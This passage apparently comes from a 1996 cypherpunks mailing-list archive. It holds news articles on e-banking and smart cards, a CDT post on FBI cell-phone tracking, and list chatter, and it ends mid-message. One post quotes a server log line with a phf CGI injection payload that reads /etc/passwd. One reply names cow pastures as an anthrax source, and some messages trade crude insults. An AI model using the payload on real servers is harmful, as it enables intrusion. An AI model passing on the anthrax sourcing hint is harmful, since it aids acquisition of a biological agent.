Companies such as US Order, Online Resources & Communications Corp., Transaction Network Services (TNS), Visa Interactive and CyberCash Inc., all based in Northern Virginia, are members of a group of start-up technology companies that are helping facilitate the delivery of electronic and phone banking services. "The D.C. area has a nice cross section of aggressive and innovative home banking players," said Phoebe Simpson, an analyst with New York-based Jupiter Communications Co., a market research firm for the on-line industry. Banking and technology experts agree that these Northern Virginia companies have become integral partners with banks in building the infrastructure that will support electronic commerce. They are selling the software, hardware, processing services, communication linkups and back-office support systems that enable financial institutions to interact with their customers outside of bank branches. While bank offices are not in danger of disappearing, bankers are increasingly looking for lower-cost delivery channels. Most are turning to outside electronic commerce companies to help them set up their own on-line or phone banking systems. "What we have now is banking without boundaries. Banks now need to cooperate and collaborate with a whole new source of channel operators," said Richard Crone, vice president and general manager of CyberCash. "Our charter is to empower customers to do their banking anywhere, any time or with anything." One reason many of these companies have set up shop here, said company executives and banking consultants, is to be near such technology firms as Washington-based MCI Communications Corp., Dulles-based America Online Inc. and PSINet Inc., an Internet access company based in Herndon. "We are the de facto Silicon Valley for on-line information companies," said John J. McDonnell Jr., president and CEO of TNS of Reston. 
The company has developed a low-cost system for facilitating high-speed, point-of-sale transactions, such as those made with credit or debit cards. Many company executives said they decided to launch their firms in Northern Virginia because of its proximity to banking regulators and lawmakers, who are trying to determine how electronic banking technology will affect consumers and what laws might be needed to protect customers. "This industry is important and will have a lot of regulatory need," said David Weisman, director of money and technology strategies for Forrester Research Inc., a consulting firm in Cambridge, Mass. But chief among the reasons for the growing number of electronic banking companies is the Washington area's highly skilled labor force, Weisman said. The labor pool in the area is overflowing with engineers and others with telecommunications and software experience, said Matthew P. Lawlor, chairman and CEO of Online Resources in McLean. For the most part, the on-line technology companies in this region don't compete with one another, experts said. Instead, each has positioned itself to fill certain niches in the electronic banking industry. In fact, many of the companies are linked financially or have developed partnerships. For example, TNS got its start-up capital of $ 1.5 million from William N. Melton, CyberCash's co-founder. US Order sold its core on-line banking operations to Visa Interactive, and 50 of its employees went to work for the newly formed company. Now the two companies market each other's services. "This is a monstrous market and no single organization is going to dominate," said William Gorog, chief operating officer of US Order. Gorog said CyberCash's concentration on developing secure payment systems for electronic commerce on the Internet is good for US Order's business. CyberCash, based in Herndon, currently uses encryption technology for secure transmission of credit-card data. 
Online Resources has decided to go after small and medium-size banks to sell its home banking services. Online's services include home banking via computer, bill-paying software, screen-based telephones and interactive voice response systems for touch-tone telephones. "A company like Online Resources allows a small bank like us to get into this technology at a much more reasonable rate," said Frank Bentz, vice president of communications for Sandy Spring National Bank, an Olney-based banking institution with assets of $ 920 million. Visa Interactive of Herndon, which offers some of the same services as Online Resources, has signed up some of the nation's largest financial institutions including Banc One Corp. of Ohio, Barnett Banks Inc. of Jacksonville, Fla., and the Pentagon Federal Credit Union, the second-largest credit union in the Washington area. "These companies are the pioneers in this industry," said James Wells, managing director for electronic commerce at Washington-based Furash & Co., a financial services consulting firm. "By and large, the technology and innovation that is facilitating electronic commerce is not coming out of the banks." Although experts said the electronic commerce companies in Northern Virginia are still relatively small, they are creating a significant base of high-paying technical jobs. Software developers at TNS earn $ 50,000 to $ 85,000 annually, according to McDonnell. "This is not minimum-wage work," McDonnell said. "We have not spawned a lot of jobs but you have to look at the trickle-down effect. We pay big salaries so our employees can buy big cars." In just two years, CyberCash has quadrupled its employment to 160, half of whom work in the area. TNS has 110 employees, up from 45 just two years ago. Online Resources, which had 50 employees at the end of last year, now has 80. In the next several months, the company expects to have 100 employees.
"I think that the idea of creating brand-new companies and employing a hundred-plus people, especially at high-end salaries like what engineers make, will have a definite impact on the area," said Magdelena Yesil, one of the founders of CyberCash who recently left the company to start another technology firm. "People are beginning to see Virginia as an area similar to Silicon Valley, an area for launching technology companies. There is a sense of excitement." Transaction Network Services Like many entrepreneurs, John J. McDonnell Jr. was working for another company when he came up with the idea for TNS. McDonnell had been president and CEO of Digital Radio Network Inc., a Tysons Corner firm that used radio waves to carry point-of-sale transactions. McDonnell discovered that a fast-dial service could be created to carry the signal using the 950 dial-up access offered by local telephone carriers. McDonnell said he took this idea to Digital Radio's directors, but they weren't interested. So, he asked if he could trade in his stake in Digital Radio -- 4 percent of its stock -- in exchange for the right to start up a company using the idea for the transaction-oriented system. He left Digital Radio in 1989. In less than five years, TNS has become one of the biggest players in this electronic banking niche. TNS processes about 2.2 billion point-of-sale transactions a year and has captured about 30 percent of the market. The company was profitable after its first year, McDonnell said. For its most recent quarter, ended June 30, TNS reported net income of $ 1.5 million (12 cents a share), a 36 percent increase from income of $ 1.1 million (10 cents) for the same period a year earlier. The company had a year-over-year increase of 66 percent in transaction volume from its point-of-sale division. On June 3, 1991, the first day of its operation, TNS carried 43 transactions from two Sizzler steakhouses in Arlington, McDonnell said.
At 3 cents a transaction, the company generated $ 1.29 in revenue that day. On June 3, 1996, the company handled 5.6 million transactions at an average cost of 2 cents -- taking in $ 118,000 for the day. "I am a happy man," McDonnell said. Online Resources & Communications Corp. Matthew P. Lawlor views Online Resources as a one-stop shop for banks that want to provide electronic banking options for their customers. "My vision is that there will not be a single device that will be the winner in on-line banking," Lawlor said. Instead of guessing which new electronic banking technology consumers will embrace, the chairman and chief executive of Online Resources has decided to offer a full range of services to banks. Lawlor sees a future in which consumers will want to link up to their bank via touch-tone phone, personal computer, a specially designed screen-based telephone, television set or other devices that have not yet been designed. "In essence, the technology is moving so fast, half of what we do is keeping up with it," Lawlor said. Lawlor said he has positioned Online Resources to provide small and medium-size financial institutions with any of the applications and support systems they need to market interactive bank services. In a year, privately held Online Resources has gone from a client list of seven financial institutions to 42 today, including Washington-based Riggs Bank, First Virginia Banks of Falls Church and Baltimore-based Harbor Bank. "In the very beginning, we focused on the big guys but many of these big banks have their own technology people," he said. "Many of the small and mid-size banks need our skills." CyberCash Inc. CyberCash executives are quite clear on their company's role in electronic banking: It is a contractor building the "infostructure" that will allow banks to link up to their customers in cyberspace. 
"If you asked a banker 10 years ago what business he was in, he would say loans, deposits and transactions," said Richard Crone of CyberCash. "That's like saying Amtrak is in the railroad business, when they are in the transportation business. Banks today are in the information business," he said. "The value they have, for example, is informing someone that their loan has been prequalified." Crone thinks the personal computer is the bank branch of the future, through which hundreds of thousands of customers will want to conduct their banking and bill-paying business. "Consumers are going to be looking for the electronic connections that will let them reach out to the banks any time and anywhere," he said. To help move that process along, CyberCash has developed and will soon begin to test software that would allow credit card firms, utility companies and other businesses to securely receive their bills over the Internet. CyberCash is banking that consumers will want to review their bills this way and that with a double-click of a mouse will access an account and pay their creditors electronically. "We want to provide the ability to fund value in an electronic wallet," Crone said. Visa Interactive In 1994, Visa Interactive, a subsidiary of Visa International, entered the on-line industry by purchasing the electronic banking and bill-paying operations of US Order. Now, experts are predicting that Herndon-based Visa Interactive, with its credit-card ties to thousands of financial institutions, could catapult ahead of competitors such as Online Resources. The company has signed up more than 90 financial institutions for its remote banking services. Visa's goal, like those of other remote banking firms, is to build a network of services that preserve financial institutions' identities and customer relationships, much like its parent does with its credit-card services. 
"I think you will see, two years down the road, that Visa Interactive will have a rich offering of services and they will be among the major players in terms of revenue," said Simpson of Jupiter Communications. US Order Although Herndon-based US Order sold a core part of its home banking services to Visa International two years ago, it is still a key player in the electronic commerce industry. "We are right in the middle of the electronic banking business," said John C. Backus, US Order's president and chief operating officer. Among its services are bank-branded customer service, centers that handle calls for phone banking, touch-tone telephone voice recognition hardware and software systems for home banking. It also sells PC-based remote banking technology and screen-based telephones, which at a retail cost of $ 299 can dial into a consumer's bank, provide stock quotes, sports scores, news and weather information or a nationwide directory assistance service. "We enable the banks to open up the whole range of electronic commerce," said Gorog, US Order's CEO. Gorog said he's excited that his company and other Northern Virginia firms are part of an industry redefining consumer banking. "The opportunity to change the banking business is exhilarating," Gorog said. "It's so exciting that we are changing people's banking habits." Time: September 23, 1996 Cashless, Not Bankless By Adam Zagorin After watching everyone from Microsoft to Meca Software gobble up online-banking customers, banks have become eager to prove that they're not headed for extinction. Last week IBM and a group of 15 U.S. and Canadian banking behemoths, including Bank of America, Banc One and Mellon Bank, unveiled a venture that aims to provide a full range of financial services to the banks' 60 million customers at the touch of a telephone button or the click of a mouse. 
Called Integrion, the partnership will phase in such activities as bill paying, electronic lending and stock and bond trading beginning next year. "If we are dinosaurs," says Robert Gillespie, the chief executive of Cleveland-based KeyCorp, "then we're putting competitors on notice that a new breed has evolved with a voracious appetite for expanded market share." Perhaps so, but the new predators have some catching up to do. Fewer than 300 U.S. banks have set up Internet sites. Most analysts give the holdouts four years to either get wired or get left far behind. Consumers can already pay bills and check balances through computer networks like America Online and CompuServe. Microsoft, too, has been signing up banks to provide electronic financial services. Integrion plans to battle the software giant by linking consumers to accounts through the Internet, and with financial software like Intuit's Quicken. The partners will also set up interactive kiosks that act like bank branches for home banking away from home. "With this new venture," says IBM chairman Louis Gerstner, "electronic commerce will take its biggest step forward to date." The ambitious project will join a host of so-called E-money experiments that are popping up around the globe. The goal is to replace cash and checks with electronic transactions that cost just pennies to process. Citibank, a leader in this push for a cashless society, is developing what it calls an Electronic Monetary System that will permit consumers and companies to make payments electronically anywhere in the world. Visa, fresh off a test of 300,000 smart cards--plastic embedded with a cache of electronic cash--at the Atlanta Olympics, will soon launch similar projects in 14 other countries, including Canada, Australia and in Hong Kong. E-money devotees like Valerie Baptiste, a San Francisco secretary, think cash is passe. 
Baptiste pays for her morning bagel and decaf with a smart card designed by Britain's Mondex and being tested in the U.S. with partners that include Wells Fargo and AT&T. As other customers fumble with change, Baptiste hands her card to a cashier who takes less than five seconds to punch it into a machine that deducts $2.15 from the stored-up funds. "This is the beginning of the end of cash," Baptiste says. Unless banks charge swiftly into the E-money era, it could be the end of many of them too.

Associated Press: Tuesday, September 17, 1996
Merchants Like Smart Cards to Keep Tabs on Customers
By PATRICIA LAMIELL

Merchants are attracted to "smart cards" as a way to gather information about their customers, according to a survey released Monday by a group promoting the plastic cash cards that are embedded with a computer chip. Results were released at the opening of the two-day convention of the group, the Smart Card Forum, which also is trying to convince the public that smart cards are protected and confidential. Customers can use smart cards like debit cards or automatic teller cards, to pay for anything from gas to groceries. Because the card also has a computer chip, it can keep track of what consumers buy and when, and how much they spend. "A smart card can store data about customers, such as product preferences, spending history, and important information that can help provide improved personalized customers service," said Cliff Wilke, vice president for business development at Mobil Oil Credit Corp. Polls done by the Harris organization and the forum have shown that consumers are receptive to using smart cards but concerned about storing personal data on them. In a 1995 forum study, 70 percent asked what safeguards exist to prevent unauthorized access to their personal, financial and medical information. Merchants surveyed by the Smart Card Forum said the cards made transactions quicker and cheaper for them.
They also said the cards made it easy to gather information on customers for use in marketing and promotional programs, and for loyalty programs like frequent flier miles. Most merchants surveyed said they believed consumers spend more when they pay with a credit or debit card than when they pay with cash. The study found other benefits to merchants such as theft prevention. The study also indicated that the cards don't have to be used that much to make them cost-effective for the merchant. "Grocery stores, convenience stores, movie theaters and gasoline retailers indicated that a mere 2 to 10 percent - an extremely low threshold of consumer demand - is required for them to realize the benefits of smart cards," the group said. While the survey results released by the forum highlighted selling points for the cards, recent tests have revealed obstacles to be overcome to win merchant and consumer acceptance. Consumers were frustrated when they found some merchants listed in smart card directories either had not installed equipment for using the cards or stopped using the equipment because of malfunctions, according to an independent study of the Visa Cash Card tests at the Olympics in Atlanta. But that study, released earlier this month by Brittain Associates Inc., also reported that most smart card users said they found the card attractive and would use it in the future if the number of merchants accepting it increased dramatically. The Smart Card Forum interviewed 65 major merchants in 11 categories, such as grocery, gas, convenience stores, drug stores, restaurants and theaters. Established in 1993, the forum has more than 225 corporate and government members including Chase Manhattan Corp., Citibank, MCI Communications Inc., MasterCard, Visa, International Business Machines Corp., Microsoft Corp., Mobil and Delta Air Lines Inc. Federal agency members include the Postal Service, the Federal Reserve, and the treasury and defense departments. 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From skeeve at skeeve.net Fri Sep 20 13:02:43 1996 From: skeeve at skeeve.net (Skeeve Stevens) Date: Sat, 21 Sep 1996 04:02:43 +0800 Subject: Go away CIA Message-ID: <199609201646.CAA00999@myinternet.myinternet.net>

Well well... After putting up the CIA hack mirror page on http://www.skeeve.net/cia/ I learnt a few things.

o it got 50,000 hits in 1 day

o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov department looked at it masses of times. The CIA looked at it every 10-15 minutes.

    zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l
    281

o Even the CIA tries to hack you.

    relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180

o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and ncsc.mil sites.

as I speak the house are looking at it.

    b252-209.house.gov unknown - [21/Sep/1996:02:41:37 +1000] "GET /cia/

I "PRESUME" there are no laws (international or otherwise) being broken by my housing of the mirror... not like I actually care.. but it would be good to know.

Ok... I've been up all night chuckling at all the different sort of sites hitting the mirror... time to sleep.
-------------------------------------------------------------------- Skeeve Stevens Email: skeeve at skeeve.net CEO/The Big Boss/All round nice guy URL: http://www.skeeve.net/ MyInternet Australian Anglicans Online http://www.myinternet.net/ http://www.anglican.asn.au/ Phone: (+612) 869-3334 Mobile: (0414) SKEEVE [+61414-753-383] Key fingerprint = D2 7E 91 53 19 FE D0 5C DE 34 EA AF 7A 5C 4D 3E

From editor at cdt.org Fri Sep 20 13:13:57 1996 From: editor at cdt.org (Bob Palacios) Date: Sat, 21 Sep 1996 04:13:57 +0800 Subject: CDT Policy Post 2.32 - FBI Surveillance Demands Rejected on Privacy Grounds Message-ID:

-----------------------------------------------------------------------------
The Center for Democracy and Technology
Volume 2, Number 32
----------------------------------------------------------------------------
A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
CDT POLICY POST Volume 2, Number 32 September 20, 1996

CONTENTS:
(1) FBI Demands for Broad New Surveillance Power Rejected on Privacy Grounds
(2) CDT Background Memo on the FBI Demands
(3) How to Subscribe/Unsubscribe
(4) About CDT, contacting us

** This document may be redistributed freely with this banner intact **
Excerpts may be re-posted with permission of
** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) FBI Demands for Broad New Surveillance Power Rejected on Privacy Grounds

A telecommunications industry standards body on Thursday voted to reject a demand by the FBI to create a national
tracking system out of the wireless telephone network. CDT applauds this decision as a significant victory for privacy and condemns the FBI's blatant efforts to subvert the specific requirements of the Communications Assistance for Law Enforcement Act (CALEA, also known as "Digital Telephony").

"The FBI is demanding that every cell phone double as a tracking device, providing instant and continuous location information not just when a subject is talking but whenever a cellular phone is turned on," said CDT Executive Director Jerry Berman. "The FBI is demanding real-time tracking of anyone suspected of committing a crime. This is a clear violation of the statute and the Fourth Amendment," Berman added.

At issue are technical standards currently being drafted to implement the 1994 law. The FBI, which holds an influential position within the industry standards process, has demanded that the wireless telephone network be designed in a way that would allow real time tracking of individuals suspected of a crime.

Specifically, the FBI is demanding that wireless networks be designed to facilitate:

* Tracking of the physical location of a subject any time a cellular phone is turned on (even if no call is being made or received)
* Tracking of the physical location of a subject when a cellular phone moves within a service area or moves to another carrier's service area
* Tracking of the physical location of a subject when a cellular phone makes or receives a call
* Delivery of this information to law enforcement in real time (within 500 milliseconds)

Although law enforcement currently has the authority to obtain certain location information through a search warrant, the standards proposed by the FBI would have allowed access to far more detailed location information under a lower standard.

"The law was designed to freeze the FBI in time, not as a blank check to the FBI to design the telecommunications network any way it pleased," Berman said.
"The FBI's demands go far beyond what's permitted under CALEA and contradict statements by Director Freeh before Congress 2 years ago." The drafters of CALEA specifically stated that the statute was not designed to expand law enforcement surveillance authority. The Committee report on the legislation notes: "The FBI director testified that the legislation was intended to preserve the status quo, that it was intended to provide law enforcement no more and no less access to information than it had in the past. The Committee urges against over broad interpretation of the requirements." -- House Judiciary Committee Report to Accompany H.R. 4922. Rept. 103-827 Part 1, Page 22 NEXT STEPS In order to ensure public oversight and accountability over the FBI's surveillance authority, CALEA requires the government to reimburse the telecommunications industry for the costs of meeting the statute's requirements. Congress is currently considering a mechanism to fund the implementation of the law. CDT urges the Congress to exercise its oversight role to determine whether the FBI is seeking to use CALEA to expand current surveillance capabilities contrary to the specific intent of the law. Unless and until the FBI clarifies its intent and justifies its demands, Congress should not allow the expenditure of any funds to implement CALEA. CDT and a ad-hoc task force of other privacy organizations and telecommunications industry representatives are currently conducting a review of electronic surveillance issues at the request of Senators Patrick Leahy (D-VT) and Arlen Specter (R-PA). The task force report will cover the implementation of CALEA and will be released within the next few months. CDT stands ready to intervene again at the standards setting process and before the FCC if necessary in order to ensure that privacy is protected as CALEA is implemented. 
The Center for Democracy and Technology is a Washington DC based non-profit public interest organization focusing on free speech and privacy issues in new computer and communications technology. CDT can be found on the World Wide Web at: http://www.cdt.org/ ----------------------------------------------------------------------- (2) CDT BACKGROUND MEMO ON THE FBI DEMANDS FBI SEEKS TO USE CELLULAR TELEPHONES AS TRACKING DEVICES The FBI is demanding the telecommunications industry design cellular telephone networks in a way which would allow law enforcement to track the physical location and movements of individuals in clear violation of the law. This effort by the FBI raises grave privacy concerns and must be rejected by the telecommunications industry. In ongoing discussions with a Telecommunications Industry Association committee established to set technical standards to implement the Communications Assistance for Law Enforcement Act (CALEA, P.L. 103-414, also known as the "Digital Telephony" statute), the FBI is requesting surveillance capability far beyond current law enforcement capabilities and in clear violation of the scope of the law. CALEA was not designed as a blank check from Congress allowing law enforcement to design the telecommunications network to expand existing surveillance capability. Rather, the statute was carefully balanced to ensure that law enforcement maintain the status quo. This overreaching by the FBI raises serious privacy concerns and clearly violates the balance struck by CALEA. CDT strongly urges Congress to refrain from approving any funding for the implementation of CALEA until the FBI makes its intentions clear. FBI Demanding Location Information In Clear Violation of the Statute The FBI's request is contained in a proposal called the Electronic Surveillance Interface (ESI), which specifies the design of the interface between the telecommunications network and law enforcement's own surveillance equipment. 
The FBI has refused a formal request by CDT to view a copy of the ESI. However, documents obtained from a meeting of the FBI and the telecommunications industry on September 12 indicate that the FBI is demanding that cellular networks be designed to deliver location information to law enforcement. Specifically, the ESI states that cellular networks must be designed to provide the geographic location of a particular subject:

The ESI states:

R7-62 The SSM (Surveillance Status Message) shall be delivered to the LEA (Law Enforcement Authority) whenever the subject changes location or between systems and this location is available to the IAP (Intercept Access Point)

In short, the FBI is requesting that the cellular network be designed to report the geographic location of an individual subject:

1. When a cellular phone is turned on (even if no call is made)
2. When a cellular phone moves within a service area or moves to another carrier's service area.
3. When a cellular phone makes or receives a call.

The FBI claims that location information has to be provided to law enforcement under CALEA because it is part of "call setup information." However, in his testimony before a joint hearing of the House and Senate Judiciary Committees on March 18, 1994, FBI director Freeh stated exactly the opposite:

"Several privacy-based spokespersons have criticized the wording of the definition (of call setup information)... alleging that the government is seeking a new, pervasive, automated 'tracking' capability. Such allegations are completely wrong.... In order to make clear that the acquisition of such information is not...
included within the term 'call setup information' we are prepared to add a concluding phrase to this definition to explicitly clarify the point: '*** except that such information [call setup information] shall not include any information that may disclose the physical location of a mobile facility or service beyond that associated with the number's area code or exchange.'" (Testimony of FBI director Louis Freeh before a joint hearing of the House Judiciary Subcommittee on Civil and Constitutional Rights and the Senate Judiciary Subcommittee on Technology and the Law, March 18, 1994. S. Hrg 103-1022).

The drafters of CALEA noted in the Committee report that the statute was not designed to expand law enforcement surveillance ability:

"The FBI director testified that the legislation was intended to preserve the status quo, that it was intended to provide law enforcement no more and no less access to information than it had in the past. The Committee urges against over broad interpretation of the requirements." (House Judiciary Committee Report to Accompany H.R. 4922. Rept. 103-827 Part 1, page 22)

The FBI's demand that all wireless communications equipment provide the physical locations of a subscriber at all times raises obvious privacy issues and goes well beyond the scope of CALEA and the explicit statements of the FBI.

No Funds Should Be Appropriated to Implement CALEA Until This Issue is Resolved

In passing CALEA, Congress sought to preserve law enforcement's ability to conduct electronic surveillance as new communications technologies are developed. At the same time, Congress was very clear that the law was designed to preserve the status quo and not to expand law enforcement surveillance authority. In addition, Congress took the extra step of including substantial Congressional oversight and public accountability to the implementation process in order to ensure that law enforcement did not overreach and that privacy interests would be protected.
The law requires the telecommunications industry to set standards for meeting the FBI's general requirements in an open process, allows interested parties to challenge any standard before the FCC if it fails to protect privacy, and requires Congressional oversight and accountability over the implementation of the law by mandating government reimbursement for expensive capability upgrades. We urge Congress to exercise its oversight role to determine whether in fact the FBI is seeking to use CALEA to expand its current surveillance capabilities contrary to the intent of the law. Unless and until the FBI clarifies its intent and justifies its demands, Congress should not allow the expenditure of any funds to implement CALEA. We look forward to discussing this issue with you further. If you have any questions please contact: Center for Democracy and Technology +1.202.637.9800 Danny Weitzner, Deputy Director Jonah Seiger, Policy Analyst ----------------------------------------------------------------------- (3) SUBSCRIPTION INFORMATION Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post news distribution list. CDT Policy Posts, the regular news publication of the Center For Democracy and Technology, are received by nearly 10,000 Internet users, industry leaders, policy makers and activists, and have become the leading source for information about critical free speech and privacy issues affecting the Internet and other interactive communications media. 
To subscribe to CDT's Policy Post list, send mail to policy-posts-request at cdt.org with a subject: subscribe policy-posts If you ever wish to remove yourself from the list, send mail to the above address with a subject of: unsubscribe policy-posts ----------------------------------------------------------------------- (4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies. Contacting us: General information: info at cdt.org World Wide Web: URL:http://www.cdt.org/ FTP URL:ftp://ftp.cdt.org/pub/cdt/ Snail Mail: The Center for Democracy and Technology 1634 Eye Street NW * Suite 1100 * Washington, DC 20006 (v) +1.202.637.9800 * (f) +1.202.637.0968 ----------------------------------------------------------------------- End Policy Post 2.32 9/20/96 ----------------------------------------------------------------------- From unicorn at schloss.li Fri Sep 20 13:52:47 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 04:52:47 +0800 Subject: Fear of Flying -- from HotWired In-Reply-To: <199609190446.VAA04571@netcom8.netcom.com> Message-ID: On Wed, 18 Sep 1996, Bill Frantz wrote: > At 2:51 PM 9/18/96 -0400, Black Unicorn wrote: > >> >Culturing and growing anthrax is painfully simple. No DNA required. > >> > >> Sorry Unicorn, you missed my point. (1) You need DNA to grow bacteria. > >> You can get the DNA two ways. (A) You get a sample of the beast, or (B) > >> You get a DNA sequence and then regenerate the DNA. (I don't think B is > >> technically feasable yet.) (2) You can't send samples of the beast thru > >> the net. > > > >I think your point was that the net was not responsible for the > >proliferation of Anthrax development data. (Am I wrong?) 
> > My point was that you need more than just information (but see below). You > also need some materials that may be hard to get. Being totally ignorant > in the anthrax growing area, I have no idea where I would get my starter > bacteria. (Presumably any net-info would tell me. I haven't looked.) Any of several cow pastures in the midwest. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From dlv at bwalk.dm.com Fri Sep 20 13:57:42 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 04:57:42 +0800 Subject: The periodic caveat about Timmy May In-Reply-To: Message-ID: >From DMiskell at envirolink.org Fri Sep 20 10:22:57 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 11:09:08 EDT for dlv Received: from uhost1.servtech.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA16482 for dlv at bwalk.dm.com; Fri, 20 Sep 96 10:22:57 -0400 Received: from mocha.hotliquid.com (mocha.hotliquid.com [204.249.118.9]) by uhost1.servtech.com (8.7.6/8.7.3) with SMTP id OAA03529; Fri, 20 Sep 1996 14:22:53 GMT Received: from [150.160.45.150] by mocha.hotliquid.com (SMI-8.6/SMI-SVR4) id KAA03478; Fri, 20 Sep 1996 10:18:02 -0400 X-Sender: darius at hotliquid.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 20 Sep 1996 09:38:26 -0500 To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) From: DMiskell at envirolink.org (Daniel Christopher Miskell) Subject: Re: The periodic caveat about Timmy May Cc: cypherpunks at toad.com >attila writes: > >> In <199609190517.HAA00851 at basement.replay.com>, on 09/19/96 >> at 07:17 AM, nobody at flame.alias.net (Anonymous) said: >> >> = .Timmy May habitually digs into his cesspool of a mind for his >> = .mailing list fertilizer. >> >> this is humour. it tickles the imagination, and the reference >> to tim is lost! > >Can we get all this non-crypto-relevant shit off of this mailing list please? 
> >--- > >Dr.Dimitri Vulis KOTM >Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps Sorry, dear, but complaining isn't going to change it, and simple telling people to shut the fuck up is going to go nowhere. If you want solely crypto relevent material, subscribe to the filtered list. I mean, come on -- you know this list is suseptable (sp?) to noise and spam. Besides, people suggest to me that you are the anonymous mailer. So maybe you should keep a low profile on this. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From dlv at bwalk.dm.com Fri Sep 20 14:01:56 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 05:01:56 +0800 Subject: CIA hacked In-Reply-To: Message-ID: >From DMiskell at envirolink.org Fri Sep 20 10:26:25 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 11:09:09 EDT for dlv Received: from uhost1.servtech.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA16770 for dlv at bwalk.dm.com; Fri, 20 Sep 96 10:26:25 -0400 Received: from mocha.hotliquid.com (mocha.hotliquid.com [204.249.118.9]) by uhost1.servtech.com (8.7.6/8.7.3) with SMTP id OAA03565; Fri, 20 Sep 1996 14:26:20 GMT Received: from [150.160.45.150] by mocha.hotliquid.com (SMI-8.6/SMI-SVR4) id KAA03490; Fri, 20 Sep 1996 10:21:30 -0400 X-Sender: darius at hotliquid.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 20 Sep 1996 09:41:54 -0500 To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) From: DMiskell at envirolink.org (Daniel Christopher Miskell) Subject: Re: CIA hacked Cc: tcmay at got.net >>From remailer at mailhub.bart.nl Thu Sep 19 13:18:03 1996 >Received: by bwalk.dm.com (1.65/waf) > via UUCP; Thu, 19 Sep 96 16:10:20 EDT > for dlv >Received: from spoof.bART.nl by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) 
>via SMTP; > id AA03960 for dlv at bwalk.dm.com; Thu, 19 Sep 96 13:18:03 -0400 >Received: (from remailer at localhost) by spoof.bart.nl (8.7.5/8.6.8) id >TAA28972 for dlv at bwalk.dm.com; Thu, 19 Sep 1996 19:19:58 +0200 (MET DST) >Date: Thu, 19 Sep 1996 19:19:58 +0200 (MET DST) >Message-Id: <199609191719.TAA28972 at spoof.bart.nl> >To: dlv at bwalk.dm.com >From: remailer at 2005.bart.nl (Anonymous) >Comments: Please report misuse of this automated remailing service to > > The contents of this message are neither approved or > condoned by nl.com or our host bART Internet. > *** Replying to it will not send your reply to the sender *** > There is no way to determine the originator of this message. If you wish >to be blocked from receiving all anonymous mail, send your request to the > mailing list. The operator of this particular >remailer can be reached at >Subject: Re: CIA hacked > >Return-Path: >To: cypherpunks at toad.com >Subject: Re: CIA hacked >From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Comments: Dole/Kemp '96! >Date: Thu, 19 Sep 96 08:08:39 EDT >Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. >Sender: owner-cypherpunks at toad.com > >Mike van der Merwe writes: >> I'm sure we will find out in a few years that Microsoft invented the >> Net. Or brought it to the masses. Or saved it from a certain and >> early demise. Or all of the above. >> JAMES SEYMOUR > >>Dr. John M. Grubor created the 'net. > >Who created you? You tub of shit? Dude, why do you even bother? It is simply not constructive to keep insulting and stabbing at people. You gripe about the non-crypto-relevent stuff, then you go and create it repeatedly. If you don't like what people have to say, take your potty mouth to another list. Daniel. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? 
-- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From dougr at skypoint-gw.globelle.com Fri Sep 20 14:07:17 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Sat, 21 Sep 1996 05:07:17 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA Message-ID: Those of you who took Logic 1001 will recall the paradox known as "The Heap" which goes like this: 1. A single grain of sand does not constitute a heap of sand. 2. You can create a heap from a non-heap by adding a single grain of sand. 3. Therefore, there is *NO SUCH THING* as a heap of sand. You with me here? Okay, this is important, because the public actually does think like this: 1. Our current society in America is not oppressive. (generally accepted) 2. You cannot change a non-oppressive society into an oppressive society by removing one liberty from its citizens. (also generally accepted) 3. Therefore, it is not possible for America to become an oppressive society. Sleep well, Douglas B. Renner From isptv at access.digex.net Fri Sep 20 14:07:38 1996 From: isptv at access.digex.net (ISP-TV Main Contact) Date: Sat, 21 Sep 1996 05:07:38 +0800 Subject: Declan McCullagh interview on ISP-TV Monday Night Message-ID: <199609201816.OAA22813@access5.digex.net> *** ISP-TV Program Announcement: Declan McCullagh Interview *** Monday, Sept. 23 9:00 PM ET Online activist Declan McCullagh runs the Justice on Campus project, is a plaintiff in the ACLU/EFF court challenge to the Communications Decency Act, and maintains the Fight-Censorship mailing list. He also writes for WIRED/HotWired, and recently described the CDA trial to readers of Playboy Magazine. Our chat with Declan will include details of international Internet censorship, his discoveries 